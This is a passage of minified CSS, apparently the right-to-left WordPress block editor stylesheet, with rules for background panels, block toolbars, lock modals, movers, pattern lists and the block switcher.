.block-editor-global-styles-background-panel__inspector-media-replace-container.is-open{ background-color:#f0f0f0; } .block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__image-tools-panel-item{ border:0; flex-grow:1; } .block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__image-tools-panel-item .components-dropdown{ display:block; } .block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__inspector-preview-inner{ height:100%; } .block-editor-global-styles-background-panel__inspector-media-replace-container .components-dropdown{ display:block; } .block-editor-global-styles-background-panel__inspector-media-replace-container .components-dropdown .block-editor-global-styles-background-panel__dropdown-toggle{ height:40px; } .block-editor-global-styles-background-panel__image-tools-panel-item{ border:1px solid #ddd; grid-column:1 / -1; position:relative; } .block-editor-global-styles-background-panel__image-tools-panel-item .components-drop-zone__content-icon{ display:none; } .block-editor-global-styles-background-panel__image-tools-panel-item .components-dropdown{ display:block; } .block-editor-global-styles-background-panel__image-tools-panel-item button.components-button{ color:#1e1e1e; display:block; width:100%; } .block-editor-global-styles-background-panel__image-tools-panel-item button.components-button:hover{ color:var(--wp-admin-theme-color); } .block-editor-global-styles-background-panel__image-tools-panel-item button.components-button:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-editor-global-styles-background-panel__image-tools-panel-item .block-editor-global-styles-background-panel__loading{ height:100%; padding:10px 0 0; position:absolute; width:100%; z-index:1; } .block-editor-global-styles-background-panel__image-tools-panel-item .block-editor-global-styles-background-panel__loading svg{ margin:0; } .block-editor-global-styles-background-panel__dropdown-toggle{ background:#0000; border:none; cursor:pointer; height:100%; padding-left:32px; padding-right:12px; width:100%; } .block-editor-global-styles-background-panel__reset{ left:0; margin:auto 8px; opacity:0; position:absolute; top:8px; } @media not (prefers-reduced-motion){ .block-editor-global-styles-background-panel__reset{ transition:opacity .1s ease-in-out; } } .block-editor-global-styles-background-panel__reset.block-editor-global-styles-background-panel__reset{ border-radius:2px; } .block-editor-global-styles-background-panel__dropdown-toggle:hover+.block-editor-global-styles-background-panel__reset,.block-editor-global-styles-background-panel__reset:focus,.block-editor-global-styles-background-panel__reset:hover{ opacity:1; } @media (hover:none){ .block-editor-global-styles-background-panel__reset{ opacity:1; } } .block-editor-global-styles-background-panel__inspector-media-replace-title{ text-align:start; text-align-last:center; white-space:normal; word-break:break-all; } .block-editor-global-styles-background-panel__inspector-preview-inner .block-editor-global-styles-background-panel__inspector-image-indicator-wrapper{ height:20px; min-width:auto; width:20px; } .block-editor-global-styles-background-panel__inspector-image-indicator{ background-size:cover; border-radius:50%; display:block; height:20px; position:relative; width:20px; } .block-editor-global-styles-background-panel__inspector-image-indicator:after{ border:1px solid #0000; border-radius:50%; bottom:-1px; box-shadow:inset 0 0 0 1px #0003; box-sizing:inherit; content:""; left:-1px; position:absolute; right:-1px; top:-1px; } .block-editor-global-styles-background-panel__dropdown-content-wrapper{ min-width:260px; overflow-x:hidden; } .block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker-wrapper{ background-color:#f0f0f0; border:1px solid #ddd; border-radius:2px; width:100%; } .block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker__media--image{ max-height:180px; } .block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker:after{ content:none; } .modal-open .block-editor-global-styles-background-panel__popover{ z-index:159890; } .block-editor-global-styles-background-panel__media-replace-popover .components-popover__content{ width:226px; } .block-editor-global-styles-background-panel__media-replace-popover .components-button{ padding:0 8px; } .block-editor-global-styles-background-panel__media-replace-popover .components-button .components-menu-items__item-icon.has-icon-right{ margin-right:16px; } .block-editor-block-alignment-control__menu-group .components-menu-item__info{ margin-top:0; } iframe[name=editor-canvas]{ box-sizing:border-box; display:block; height:100%; width:100%; } @media not (prefers-reduced-motion){ iframe[name=editor-canvas]{ transition:all .4s cubic-bezier(.46, .03, .52, .96); } } iframe[name=editor-canvas]{ background-color:var(--wp-editor-canvas-background); } .block-editor-block-icon{ align-items:center; display:flex; height:24px; justify-content:center; width:24px; } .block-editor-block-icon.has-colors svg{ fill:currentColor; } @media (forced-colors:active){ .block-editor-block-icon.has-colors svg{ fill:CanvasText; } } .block-editor-block-icon svg{ max-height:24px; max-width:24px; min-height:20px; min-width:20px; } .block-editor-block-inspector p:not(.components-base-control__help){ margin-top:0; } .block-editor-block-inspector h2,.block-editor-block-inspector h3{ color:#1e1e1e; font-size:13px; margin-bottom:1.5em; } .block-editor-block-inspector .block-editor-html-element-control:where(:not(:last-child)),.block-editor-block-inspector .block-editor-image-size-control:where(:not(:last-child)),.block-editor-block-inspector .components-base-control:where(:not(:last-child)),.block-editor-block-inspector .components-radio-control:where(:not(:last-child)){ margin-bottom:16px; } .block-editor-block-inspector .block-editor-html-element-control .components-base-control,.block-editor-block-inspector .block-editor-image-size-control .components-base-control,.block-editor-block-inspector .components-focal-point-picker-control .components-base-control,.block-editor-block-inspector .components-query-controls .components-base-control,.block-editor-block-inspector .components-range-control .components-base-control{ margin-bottom:0; } .block-editor-block-inspector .components-panel__body{ border:none; border-top:1px solid #e0e0e0; margin-top:-1px; } .block-editor-block-inspector__no-block-tools,.block-editor-block-inspector__no-blocks{ background:#fff; display:block; font-size:13px; padding:32px 16px; text-align:center; } .block-editor-block-inspector__no-block-tools{ border-top:1px solid #ddd; } .block-editor-block-inspector-edit-contents-button{ justify-content:center; margin-top:8px; } .block-editor-block-list__insertion-point{ bottom:0; left:0; position:absolute; right:0; top:0; } .block-editor-block-list__insertion-point-indicator{ background:var(--wp-admin-theme-color); border-radius:2px; opacity:0; position:absolute; transform-origin:center; will-change:transform, opacity; } .block-editor-block-list__insertion-point.is-vertical>.block-editor-block-list__insertion-point-indicator{ height:4px; top:calc(50% - 2px); width:100%; } .block-editor-block-list__insertion-point.is-horizontal>.block-editor-block-list__insertion-point-indicator{ bottom:0; right:calc(50% - 2px); top:0; width:4px; } .block-editor-block-list__insertion-point-inserter{ display:none; position:absolute; will-change:transform; } @media (min-width:480px){ .block-editor-block-list__insertion-point-inserter{ display:flex; } } .block-editor-block-list__insertion-point-inserter{ justify-content:center; right:calc(50% - 12px); top:calc(50% - 12px); } .block-editor-block-list__block-side-inserter-popover .components-popover__content>div{ pointer-events:none; } .block-editor-block-list__block-side-inserter-popover .components-popover__content>div>*{ pointer-events:all; } .block-editor-block-list__empty-block-inserter.block-editor-block-list__empty-block-inserter{ left:0; line-height:0; position:absolute; top:0; } .block-editor-block-list__empty-block-inserter.block-editor-block-list__empty-block-inserter:disabled{ display:none; } .block-editor-block-list__empty-block-inserter .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon{ background:#1e1e1e; color:#fff; height:24px; min-width:24px; padding:0; } .block-editor-block-list__empty-block-inserter .block-editor-inserter__toggle.components-button.has-icon:hover,.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon:hover{ background:var(--wp-admin-theme-color); color:#fff; } .block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon{ background:var(--wp-admin-theme-color); } .block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon:hover{ background:#1e1e1e; } @keyframes hide-during-dragging{ to{ position:fixed; transform:translate(-9999px, 9999px); } } .components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar{ border:1px solid #1e1e1e; border-radius:2px; margin-bottom:8px; margin-top:8px; overflow:visible; pointer-events:all; position:static; width:auto; } .components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar.has-parent{ margin-right:56px; } .show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar.has-parent{ margin-right:0; } .components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar{ overflow:visible; } .components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar .components-toolbar,.components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar .components-toolbar-group{ border-left-color:#1e1e1e; } .components-popover.block-editor-block-list__block-popover.is-insertion-point-visible{ visibility:hidden; } .is-dragging-components-draggable .components-popover.block-editor-block-list__block-popover{ opacity:0; } @media not (prefers-reduced-motion){ .is-dragging-components-draggable .components-popover.block-editor-block-list__block-popover{ animation:hide-during-dragging 1ms linear forwards; } } .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector{ position:absolute; right:-57px; } .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector:before{ content:""; } .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector .block-editor-block-parent-selector__button{ background-color:#fff; border:1px solid #1e1e1e; padding-left:6px; padding-right:6px; } .show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector .block-editor-block-parent-selector__button{ padding-left:12px; padding-right:12px; } .show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector{ margin-right:-1px; position:relative; right:auto; } .show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-mover__move-button-container,.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar__block-controls .block-editor-block-mover{ border-right:1px solid #1e1e1e; } .is-dragging-components-draggable .components-tooltip{ display:none; } .components-popover.block-editor-block-popover__inbetween .block-editor-button-pattern-inserter__button{ pointer-events:all; position:absolute; right:50%; top:50%; transform:translateX(50%) translateY(-50%); } .block-editor-block-tools--is-dragging>.popover-slot{ display:none; } .block-editor-block-lock-modal{ z-index:1000001; } .block-editor-block-lock-modal__options{ border:0; margin:0; padding:0; } .block-editor-block-lock-modal__options legend{ margin-bottom:16px; padding:0; } .block-editor-block-lock-modal__checklist{ list-style:none; margin:0; padding:0; } .block-editor-block-lock-modal__options-all{ padding:12px 0; } .block-editor-block-lock-modal__options-all .components-checkbox-control__label{ font-weight:600; } .block-editor-block-lock-modal__checklist-item{ align-items:center; display:flex; gap:12px; justify-content:space-between; margin-bottom:0; padding:12px 32px 12px 0; } .block-editor-block-lock-modal__checklist-item .block-editor-block-lock-modal__lock-icon{ flex-shrink:0; margin-left:12px; fill:#1e1e1e; } .block-editor-block-lock-modal__checklist-item:hover{ background-color:#f0f0f0; border-radius:2px; } .block-editor-block-lock-modal__template-lock{ border-top:1px solid #ddd; margin-top:16px; padding-top:16px; } .block-editor-block-lock-modal__actions{ margin-top:24px; } .block-editor-block-lock-toolbar .components-button.has-icon{ min-width:36px !important; } .block-editor-block-toolbar__block-controls .block-editor-block-lock-toolbar{ margin-right:-6px !important; } .show-icon-labels .block-editor-block-toolbar__block-controls .block-editor-block-lock-toolbar{ border-right:1px solid #1e1e1e; margin-left:-6px; margin-right:6px !important; } .block-editor-block-allowed-blocks-control:not(:only-child){ margin-top:16px; } .block-editor-block-allowed-blocks-control__button{ justify-content:center; width:100%; } .block-editor-block-allowed-blocks-modal{ z-index:1000001; } .block-editor-block-allowed-blocks-modal__actions{ background-color:#fff; border-top:1px solid #ddd; bottom:-32px; margin:0 -32px -32px; padding:16px 32px; position:sticky; right:0; z-index:1; } .block-editor-block-breadcrumb{ list-style:none; margin:0; padding:0; } .block-editor-block-breadcrumb li{ display:inline-flex; margin:0; } .block-editor-block-breadcrumb li .block-editor-block-breadcrumb__separator{ fill:currentColor; margin-left:-4px; margin-right:-4px; transform:scaleX(-1);; } .block-editor-block-breadcrumb li:last-child .block-editor-block-breadcrumb__separator{ display:none; } .block-editor-block-breadcrumb__current{ cursor:default; } .block-editor-block-breadcrumb__button.block-editor-block-breadcrumb__button,.block-editor-block-breadcrumb__current{ color:#1e1e1e; font-size:inherit; padding:0 8px; } .block-editor-block-card{ align-items:flex-start; color:#1e1e1e; display:flex; padding:16px; } .block-editor-block-card__title{ align-items:center; display:flex; flex-wrap:wrap; font-weight:500; gap:4px 8px; } .block-editor-block-card__title.block-editor-block-card__title{ font-size:13px; line-height:1.4; margin:0; } .block-editor-block-card__name{ padding:3px 0; } .block-editor-block-card .block-editor-block-icon{ flex:0 0 24px; height:24px; margin-left:12px; margin-right:0; width:24px; } .block-editor-block-card.is-synced .block-editor-block-icon{ color:var(--wp-block-synced-color); } .block-editor-block-compare{ height:auto; } .block-editor-block-compare__wrapper{ display:flex; padding-bottom:16px; } .block-editor-block-compare__wrapper>div{ display:flex; flex-direction:column; justify-content:space-between; max-width:600px; min-width:200px; padding:0 0 0 16px; width:50%; } .block-editor-block-compare__wrapper>div button{ float:left; } .block-editor-block-compare__wrapper .block-editor-block-compare__converted{ border-right:1px solid #ddd; padding-left:0; padding-right:15px; } .block-editor-block-compare__wrapper .block-editor-block-compare__html{ border-bottom:1px solid #ddd; color:#1e1e1e; font-family:Menlo,Consolas,monaco,monospace; font-size:12px; line-height:1.7; padding-bottom:15px; } .block-editor-block-compare__wrapper .block-editor-block-compare__html span{ background-color:#e6ffed; padding-bottom:3px; padding-top:3px; } .block-editor-block-compare__wrapper .block-editor-block-compare__html span.block-editor-block-compare__added{ background-color:#acf2bd; } .block-editor-block-compare__wrapper .block-editor-block-compare__html span.block-editor-block-compare__removed{ background-color:#cc1818; } .block-editor-block-compare__wrapper .block-editor-block-compare__preview{ padding:16px 0 0; } .block-editor-block-compare__wrapper .block-editor-block-compare__preview p{ font-size:12px; margin-top:0; } .block-editor-block-compare__wrapper .block-editor-block-compare__action{ margin-top:16px; } .block-editor-block-compare__wrapper .block-editor-block-compare__heading{ font-size:1em; font-weight:400; margin:.67em 0; } .block-editor-block-draggable-chip-wrapper{ position:absolute; right:0; top:-24px; } .block-editor-block-draggable-chip{ background-color:#1e1e1e; border-radius:2px; box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005; color:#fff; cursor:grabbing; display:inline-flex; height:48px; padding:0 13px; position:relative; -webkit-user-select:none; user-select:none; width:max-content; } .block-editor-block-draggable-chip svg{ fill:currentColor; } .block-editor-block-draggable-chip .block-editor-block-draggable-chip__content{ justify-content:flex-start; margin:auto; } .block-editor-block-draggable-chip .block-editor-block-draggable-chip__content>.components-flex__item{ margin-left:6px; } .block-editor-block-draggable-chip .block-editor-block-draggable-chip__content>.components-flex__item:last-child{ margin-left:0; } .block-editor-block-draggable-chip .block-editor-block-draggable-chip__content .block-editor-block-icon svg{ min-height:18px; min-width:18px; } .block-editor-block-draggable-chip .components-flex__item{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; } .block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{ align-items:center; background-color:initial; bottom:0; display:flex; justify-content:center; left:0; opacity:0; position:absolute; right:0; top:0; } @media not (prefers-reduced-motion){ .block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{ transition:all .1s linear .1s; } } .block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled .block-editor-block-draggable-chip__disabled-icon{ background:#0000 linear-gradient(45deg, #0000 47.5%, #fff 0, #fff 52.5%, #0000 0); border-radius:50%; box-shadow:inset 0 0 0 1.5px #fff; display:inline-block; height:20px; padding:0; width:20px; } .block-draggable-invalid-drag-token .block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{ background-color:#757575; box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005; opacity:1; } .block-editor-block-manager__no-results{ font-style:italic; padding:24px 0; text-align:center; } .block-editor-block-manager__category{ margin:0 0 24px; } .block-editor-block-manager__category-title{ background-color:#fff; padding:16px 0; position:sticky; top:-4px; z-index:1; } .block-editor-block-manager__category-title .components-checkbox-control__label{ font-weight:600; } .block-editor-block-manager__checklist{ margin-top:0; } .block-editor-block-manager__category-title,.block-editor-block-manager__checklist-item{ border-bottom:1px solid #ddd; } .block-editor-block-manager__checklist-item{ align-items:center; display:flex; justify-content:space-between; margin-bottom:0; padding:8px 16px 8px 0; } .components-modal__content .block-editor-block-manager__checklist-item.components-checkbox-control__input-container{ margin:0 8px; } .block-editor-block-manager__checklist-item .block-editor-block-icon{ margin-left:10px; fill:#1e1e1e; } .block-editor-block-manager__results{ border-top:1px solid #ddd; } .block-editor-block-manager__disabled-blocks-count+.block-editor-block-manager__results{ border-top-width:0; } .block-editor-block-mover__move-button-container{ border:none; display:flex; justify-content:center; padding:0; } @media (min-width:600px){ .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{ flex-direction:column; } .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container>*{ height:20px; min-width:0 !important; width:100%; } .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container>:before{ height:calc(100% - 4px); } .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-up-button svg{ flex-shrink:0; top:3px; } .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-down-button svg{ bottom:3px; flex-shrink:0; } .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container{ width:48px; } .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container>*{ min-width:0 !important; overflow:hidden; width:24px; } .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button{ padding-left:0; padding-right:0; } .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-up-button svg{ right:5px; } .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-down-button svg{ left:5px; } } .block-editor-block-mover__drag-handle{ cursor:grab; } @media (min-width:600px){ .block-editor-block-mover__drag-handle{ min-width:0 !important; overflow:hidden; width:24px; } .block-editor-block-mover .block-editor-block-mover__drag-handle.has-icon.has-icon{ padding-left:0; padding-right:0; } } .components-button.block-editor-block-mover-button{ overflow:hidden; } .components-button.block-editor-block-mover-button:before{ border-radius:2px; content:""; display:block; height:32px; left:8px; position:absolute; right:8px; z-index:-1; } @media not (prefers-reduced-motion){ .components-button.block-editor-block-mover-button:before{ animation:components-button__appear-animation .1s ease; animation-fill-mode:forwards; } } .components-button.block-editor-block-mover-button:focus,.components-button.block-editor-block-mover-button:focus:before,.components-button.block-editor-block-mover-button:focus:enabled{ box-shadow:none; outline:none; } .components-button.block-editor-block-mover-button:focus-visible:before{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-editor-block-navigation__container{ min-width:280px; } .block-editor-block-navigation__label{ color:#757575; font-size:11px; font-weight:500; margin:0 0 12px; text-transform:uppercase; } .block-editor-block-patterns-list__list-item{ cursor:pointer; margin-bottom:16px; position:relative; } .block-editor-block-patterns-list__list-item.is-placeholder{ min-height:100px; } .block-editor-block-patterns-list__list-item[draggable=true]{ cursor:grab; } .block-editor-block-patterns-list__item{ height:100%; outline:0; scroll-margin-bottom:56px; scroll-margin-top:24px; } .block-editor-block-patterns-list__item .block-editor-block-patterns-list__item-title{ flex-grow:1; font-size:12px; text-align:right; } .block-editor-block-patterns-list__item .block-editor-block-preview__container{ align-items:center; border-radius:4px; display:flex; overflow:hidden; } .block-editor-block-patterns-list__item .block-editor-block-preview__container:after{ border-radius:4px; outline:1px solid #0000001a; outline-offset:-1px; } @media not (prefers-reduced-motion){ .block-editor-block-patterns-list__item .block-editor-block-preview__container:after{ transition:outline .1s linear; } } .block-editor-block-patterns-list__item.is-selected .block-editor-block-preview__container:after{ outline-color:#1e1e1e; outline-offset:calc(var(--wp-admin-border-width-focus)*-1); outline-width:var(--wp-admin-border-width-focus); } .block-editor-block-patterns-list__item:hover .block-editor-block-preview__container:after{ outline-color:#0000004d; } .block-editor-block-patterns-list__item[data-focus-visible] .block-editor-block-preview__container:after{ outline-color:var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-1); outline-width:var(--wp-admin-border-width-focus); } .block-editor-block-patterns-list__item .block-editor-patterns__pattern-details:not(:empty){ align-items:center; margin-top:8px; padding-bottom:4px; } .block-editor-block-patterns-list__item .block-editor-patterns__pattern-icon-wrapper{ height:24px; min-width:24px; } .block-editor-block-patterns-list__item .block-editor-patterns__pattern-icon-wrapper .block-editor-patterns__pattern-icon{ fill:var(--wp-block-synced-color); } .block-editor-patterns__grid-pagination-wrapper .block-editor-patterns__grid-pagination{ border-top:1px solid #2f2f2f; justify-content:center; padding:4px; } .show-icon-labels .block-editor-patterns__grid-pagination-button{ width:auto; } .show-icon-labels .block-editor-patterns__grid-pagination-button span{ display:none; } .show-icon-labels .block-editor-patterns__grid-pagination-button:before{ content:attr(aria-label); } .components-popover.block-editor-block-popover{ margin:0 !important; pointer-events:none; position:absolute; z-index:31; } .components-popover.block-editor-block-popover .components-popover__content{ margin:0 !important; min-width:auto; overflow-y:visible; width:max-content; } .components-popover.block-editor-block-popover:not(.block-editor-block-popover__inbetween,.block-editor-block-popover__drop-zone,.block-editor-block-list__block-side-inserter-popover) .components-popover__content *{ pointer-events:all; } .components-popover.block-editor-block-popover__inbetween,.components-popover.block-editor-block-popover__inbetween *{ pointer-events:none; } .components-popover.block-editor-block-popover__inbetween .is-with-inserter,.components-popover.block-editor-block-popover__inbetween .is-with-inserter *{ pointer-events:all; } .components-popover.block-editor-block-popover__drop-zone *{ pointer-events:none; } .components-popover.block-editor-block-popover__drop-zone .block-editor-block-popover__drop-zone-foreground{ background-color:var(--wp-admin-theme-color); border-radius:2px; inset:0; position:absolute; } .block-editor-block-preview__container{ overflow:hidden; position:relative; width:100%; } .block-editor-block-preview__container .block-editor-block-preview__content{ margin:0; min-height:auto; overflow:visible; right:0; text-align:initial; top:0; transform-origin:top right; width:100%; } .block-editor-block-preview__container .block-editor-block-preview__content .block-editor-block-list__insertion-point,.block-editor-block-preview__container .block-editor-block-preview__content .block-list-appender{ display:none; } .block-editor-block-preview__container:after{ bottom:0; content:""; left:0; position:absolute; right:0; top:0; z-index:1; } .block-editor-block-rename-modal{ z-index:1000001; } .block-editor-block-styles__preview-panel{ display:none; z-index:90; } @media (min-width:782px){ .block-editor-block-styles__preview-panel{ display:block; } } .block-editor-block-styles__preview-panel .block-editor-block-icon{ display:none; } .block-editor-block-styles__variants{ display:flex; flex-wrap:wrap; gap:8px; justify-content:space-between; } .block-editor-block-styles__variants button.components-button.block-editor-block-styles__item{ box-shadow:inset 0 0 0 1px #ddd; color:#1e1e1e; display:inline-block; width:calc(50% - 4px); } .block-editor-block-styles__variants button.components-button.block-editor-block-styles__item:hover{ box-shadow:inset 0 0 0 1px #ddd; color:var(--wp-admin-theme-color); } .block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:hover{ background-color:#1e1e1e; box-shadow:none; } .block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active .block-editor-block-styles__item-text,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:hover .block-editor-block-styles__item-text{ color:#fff; } .block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:focus,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item:focus{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-editor-block-styles__variants .block-editor-block-styles__item-text{ text-align:start; text-align-last:center; white-space:normal; word-break:break-all; } .block-editor-block-styles__block-preview-container,.block-editor-block-styles__block-preview-container *{ box-sizing:border-box !important; } .block-editor-block-switcher{ position:relative; } .block-editor-block-switcher .components-button.components-dropdown-menu__toggle.has-icon.has-icon{ min-width:36px; } .block-editor-block-switcher__no-switcher-icon,.block-editor-block-switcher__toggle{ position:relative; } .components-button.block-editor-block-switcher__no-switcher-icon,.components-button.block-editor-block-switcher__toggle{ display:block; height:48px; margin:0; } .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon,.components-button.block-editor-block-switcher__toggle .block-editor-block-icon{ margin:auto; } .components-button.block-editor-block-switcher__no-switcher-icon{ display:flex; } .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{ margin-left:auto; margin-right:auto; min-width:24px !important; } .components-button.block-editor-block-switcher__no-switcher-icon[aria-disabled=true],.components-button.block-editor-block-switcher__no-switcher-icon[aria-disabled=true]:hover{ color:#1e1e1e; } .components-popover.block-editor-block-switcher__popover .components-popover__content{ min-width:300px; } .block-editor-block-switcher__popover-preview-container{ bottom:0; pointer-events:none; position:absolute; right:0; top:-1px; width:100%; } .block-editor-block-switcher__popover-preview{ overflow:hidden; } .block-editor-block-switcher__popover-preview .components-popover__content{ background:#fff; border:1px solid #1e1e1e; border-radius:4px; box-shadow:none; outline:none; overflow:auto; width:300px; } .block-editor-block-switcher__popover-preview .block-editor-block-switcher__preview{ margin:16px 0; max-height:468px; overflow:hidden; padding:0 16px; } .block-editor-block-switcher__popover-preview .block-editor-block-switcher__preview.is-pattern-list-preview{ overflow:unset; } .block-editor-block-switcher__preview-title{ color:#757575; font-size:11px; font-weight:500; margin-bottom:12px; text-transform:uppercase; } .block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon{ min-width:36px; } .block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle{ height:48px; } .block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-switcher__transform,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-switcher__transform{ height:48px; width:48px; } .block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-switcher__transform,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-switcher__transform{ padding:12px; } .block-editor-block-switcher__preview-patterns-container{ padding-bottom:16px; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item{ margin-top:16px; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-preview__container{ cursor:pointer; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{ border-radius:2px; height:100%; } @media not (prefers-reduced-motion){ .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{ transition:all .05s ease-in-out; } } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{ border:1px solid #0000; position:relative; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:focus,.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:hover{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:hover{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) #1e1e1e; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item .block-editor-block-switcher__preview-patterns-container-list__item-title{ cursor:pointer; font-size:12px; padding:4px; text-align:center; } .block-editor-block-switcher__no-transforms{ color:#757575; margin:0; padding:6px 8px; } .block-editor-block-switcher__binding-indicator{ display:block; padding:8px; } .block-editor-block-types-list>[role=presentation]{ display:flex; flex-wrap:wrap; overflow:hidden; } .block-editor-block-pattern-setup{ align-items:flex-start; border-radius:2px; display:flex; flex-direction:column; justify-content:center; width:100%; } .block-editor-block-pattern-setup.view-mode-grid{ padding-top:4px; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__toolbar{ justify-content:center; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container{ column-count:2; column-gap:24px; display:block; padding:0 32px; width:100%; } @media (min-width:1440px){ .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container{ column-count:3; } } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-preview__container,.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container div[role=button]{ cursor:pointer; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item{ scroll-margin:5px 0; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:hover .block-editor-block-preview__container{ box-shadow:0 0 0 2px var(--wp-admin-theme-color); } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:focus .block-editor-block-preview__container{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:2px; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:focus 